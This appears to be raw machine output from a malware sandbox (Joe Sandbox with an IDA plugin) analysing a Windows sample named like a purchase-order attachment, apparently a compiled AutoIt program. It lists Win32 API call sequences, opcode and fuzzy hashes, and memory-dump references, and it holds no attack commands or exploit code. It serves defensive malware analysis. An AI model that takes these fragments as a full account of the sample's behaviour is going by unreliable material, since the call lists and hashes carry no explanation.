                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                      • String ID:
                      • API String ID: 1827037458-0
                      • Opcode ID: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                      • Instruction ID: 2059bf27615d5950d27d4954b7579ecdb8465cb2db13ecb92d48faf32597968d
                      • Opcode Fuzzy Hash: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                      • Instruction Fuzzy Hash: BD418F711043019FD721DF28DC84BBA7BE8EB56724F1406A9F995872E2CB3198459B61
                      APIs
                      • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE21B
                      • EnableWindow.USER32(00000000,00000000), ref: 00AFE23F
                      • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE29F
                      • ShowWindow.USER32(00000000,00000004,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE2B1
                      • EnableWindow.USER32(00000000,00000001), ref: 00AFE2D5
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AFE2F8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                      • Instruction ID: 942685d9362ddae41c3b45d59edce3e8d8b46c977b2e159c3ca6d0b2e66e182d
                      • Opcode Fuzzy Hash: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                      • Instruction Fuzzy Hash: E6411A34601249EFDF26CF94C499BE47BE5BB0A314F1881A9FA588F2B2D731A845CB51
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ACBCD9
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00ACBCE0
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00ACBCEF
                      • CloseHandle.KERNEL32(00000004), ref: 00ACBCFA
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACBD29
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00ACBD3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                      • Instruction ID: 5e2a2cba3ab374beb9f19054727aed479d006214aefc72cd74276710e1491a94
                      • Opcode Fuzzy Hash: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                      • Instruction Fuzzy Hash: 8D214F72115209BBDF029F98ED4AFDE7BA9EF08315F058019FA01A6160CB76DE61DB60
                      APIs
                        • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                        • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AFE9F2
                      • LineTo.GDI32(00000000,00000003,?), ref: 00AFEA06
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFEA14
                      • LineTo.GDI32(00000000,00000000,?), ref: 00AFEA24
                      • EndPath.GDI32(00000000), ref: 00AFEA34
                      • StrokePath.GDI32(00000000), ref: 00AFEA44
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                      • Instruction ID: 44cfa833079546820c2d977700fb0bb3b35ebfefc11ff42f2c5cb2c914537ec9
                      • Opcode Fuzzy Hash: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                      • Instruction Fuzzy Hash: E811F77600014DBFDB129F94DC88EEA7FADEB08355F048422FA099A1A0DB719D559BA0
                      APIs
                      • GetDC.USER32(00000000), ref: 00ACEFB6
                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ACEFC7
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ACEFCE
                      • ReleaseDC.USER32(00000000,00000000), ref: 00ACEFD6
                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ACEFED
                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00ACEFFF
                        • Part of subcall function 00ACA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00ACA79D,00000000,00000000,?,00ACAB73), ref: 00ACB2CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDevice$ExceptionRaiseRelease
                      • String ID:
                      • API String ID: 603618608-0
                      • Opcode ID: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                      • Instruction ID: ead854f8f1b5797a5af9bfacff70bf58e2d6cf521f8d046a53a899a83ca94403
                      • Opcode Fuzzy Hash: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                      • Instruction Fuzzy Hash: 21016C75A00315BFEB109BA59C45F5EBFB8EB48751F108069FD04E7290DA709D11CF61
                      APIs
                      • __init_pointers.LIBCMT ref: 00AB87D7
                        • Part of subcall function 00AB1E5A: __initp_misc_winsig.LIBCMT ref: 00AB1E7E
                        • Part of subcall function 00AB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB8BE1
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AB8BF5
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AB8C08
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AB8C1B
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AB8C2E
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AB8C41
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AB8C54
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AB8C67
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AB8C7A
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AB8C8D
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AB8CA0
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AB8CB3
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AB8CC6
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AB8CD9
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AB8CEC
                        • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AB8CFF
                      • __mtinitlocks.LIBCMT ref: 00AB87DC
                        • Part of subcall function 00AB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00B4AC68,00000FA0,?,?,00AB87E1,00AB6AFA,00B467D8,00000014), ref: 00AB8AD1
                      • __mtterm.LIBCMT ref: 00AB87E5
                        • Part of subcall function 00AB884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AB87EA,00AB6AFA,00B467D8,00000014), ref: 00AB89CF
                        • Part of subcall function 00AB884D: _free.LIBCMT ref: 00AB89D6
                        • Part of subcall function 00AB884D: DeleteCriticalSection.KERNEL32(00B4AC68,?,?,00AB87EA,00AB6AFA,00B467D8,00000014), ref: 00AB89F8
                      • __calloc_crt.LIBCMT ref: 00AB880A
                      • GetCurrentThreadId.KERNEL32 ref: 00AB8833
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                      • String ID:
                      • API String ID: 2942034483-0
                      • Opcode ID: 4c63d4b27d8428b77d864abd9c5716601199184fb2068a6e9bd5b37ea1a621b4
                      • Instruction ID: ad7e55b539d33b5085afbfa151fee82edddc35be92537350a12d31cfdc9929aa
                      • Opcode Fuzzy Hash: 4c63d4b27d8428b77d864abd9c5716601199184fb2068a6e9bd5b37ea1a621b4
                      • Instruction Fuzzy Hash: 13F0903211A7515AF2247B7C7E17ACA26CC9F02BB4B650A2AF464D60D3FF188881C160
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 1423608774-0
                      • Opcode ID: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                      • Instruction ID: fd31a8ea27887858078b7e9fbf44a74066fbceae002c7fa837bd765d7da64dd0
                      • Opcode Fuzzy Hash: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                      • Instruction Fuzzy Hash: B701A436541211ABD7152B58ED48DEB77AAFF9A702B80452AF503972A1CFB4AC00CB91
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A91898
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A918A0
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A918AB
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A918B6
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A918BE
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A918C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                      • Instruction ID: 3b9bcdf7a7579d8408eeae52ed9e90d99d2af7cc2bd444ae3a97b82ffc07ce0d
                      • Opcode Fuzzy Hash: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                      • Instruction Fuzzy Hash: 1D0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AD8504
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AD851A
                      • GetWindowThreadProcessId.USER32(?,?), ref: 00AD8529
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8538
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8542
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8549
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                      • Instruction ID: 3af5fa37420c26538afc17cf73c4d7324f1e272211ff92879dd4d740885e70fc
                      • Opcode Fuzzy Hash: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                      • Instruction Fuzzy Hash: C8F0BE32240158BBE7201B629C0EEEF3F7CDFC6B11F404018FA05E2050EFA42A01C6B4
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 00ADA330
                      • EnterCriticalSection.KERNEL32(?,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA341
                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA34E
                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA35B
                        • Part of subcall function 00AD9CCE: CloseHandle.KERNEL32(?,?,00ADA368,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00AD9CD8
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA36E
                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA375
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                      • Instruction ID: dc07a182b7fc25d1efc266f16b0d510e1bdf06166924a533032710f0ed68f212
                      • Opcode Fuzzy Hash: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                      • Instruction Fuzzy Hash: 92F08236141211BBD3112B64ED4CDDB7B7AFF8A302B804522F203A71A1CFB59851CB91
                      APIs
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00A9BBD9: _memmove.LIBCMT ref: 00A9BC33
                      • __swprintf.LIBCMT ref: 00AAD98F
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAD832
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 1943609520-557222456
                      • Opcode ID: 5b355ce1c9edf23cd7554a04993fa93432633c3b2a6595d29a2cb7d9aa466687
                      • Instruction ID: 451047516cbf6a54acfa6f4ed7937fae907bffcd8f5ff4e6039ac1a4e497eef3
                      • Opcode Fuzzy Hash: 5b355ce1c9edf23cd7554a04993fa93432633c3b2a6595d29a2cb7d9aa466687
                      • Instruction Fuzzy Hash: 35914A716182019FCB14EF64CA86D6FBBE4EF86700F00495DF4969B6E1EB20ED45CB52
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00AEB4A8
                      • CharUpperBuffW.USER32(?,?), ref: 00AEB5B7
                      • VariantClear.OLEAUT32(?), ref: 00AEB73A
                        • Part of subcall function 00ADA6F6: VariantInit.OLEAUT32(00000000), ref: 00ADA736
                        • Part of subcall function 00ADA6F6: VariantCopy.OLEAUT32(?,?), ref: 00ADA73F
                        • Part of subcall function 00ADA6F6: VariantClear.OLEAUT32(?), ref: 00ADA74B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: a3d51a7f685e67173d5ba80522102bed283dbe0df1505ac710ad14c8e94cfaa2
                      • Instruction ID: 01d642c60d04bc8f23130544b043df2f44320c9be68883859c12443caf58888a
                      • Opcode Fuzzy Hash: a3d51a7f685e67173d5ba80522102bed283dbe0df1505ac710ad14c8e94cfaa2
                      • Instruction Fuzzy Hash: 3B918A706183419FCB10DF29C58595BB7F4AF89710F04886DF88A8B3A2DB31E945CB62
                      APIs
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • _memset.LIBCMT ref: 00AD5E56
                      • GetMenuItemInfoW.USER32(?), ref: 00AD5E85
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD5F31
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AD5F5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 9b7260aa3ced79d7857e5970fa48251af03981a4e0ab0141c8287325df07c864
                      • Instruction ID: 5b5011a0667efceb145c6e5f39737da90a5d53126ea512a20df666a890961301
                      • Opcode Fuzzy Hash: 9b7260aa3ced79d7857e5970fa48251af03981a4e0ab0141c8287325df07c864
                      • Instruction Fuzzy Hash: 2351D332A147019AD715EB3CC945BABB7E8EF59350F080A2EF897D7291DB70CD448792
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AD10B8
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AD10EE
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AD10FF
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD1181
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                      • Instruction ID: 1dc8b2e770486a49c87a56d97e7b801039850a5a134065e91977356197d1478f
                      • Opcode Fuzzy Hash: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                      • Instruction Fuzzy Hash: 534129B1600205FFDB15CF55C884B9ABBB9EF44754B1481AEFA0A9F305D7B1DA44CBA0
                      APIs
                      • _memset.LIBCMT ref: 00AD5A93
                      • GetMenuItemInfoW.USER32 ref: 00AD5AAF
                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AD5AF5
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B518F0,00000000), ref: 00AD5B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 0cb392341139f6bae4fd9df29e8dcac7f4146a6f0be457b5cec8611c52f33447
                      • Instruction ID: c03a201978f72c51f23077ea994570e87e37ddb3829a566c077f7c4ee70909e5
                      • Opcode Fuzzy Hash: 0cb392341139f6bae4fd9df29e8dcac7f4146a6f0be457b5cec8611c52f33447
                      • Instruction Fuzzy Hash: C6416E716047019FDB149F24C884B5ABBE5EF89714F14461FF9A69B3D1E770A800CB62
                      APIs
                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
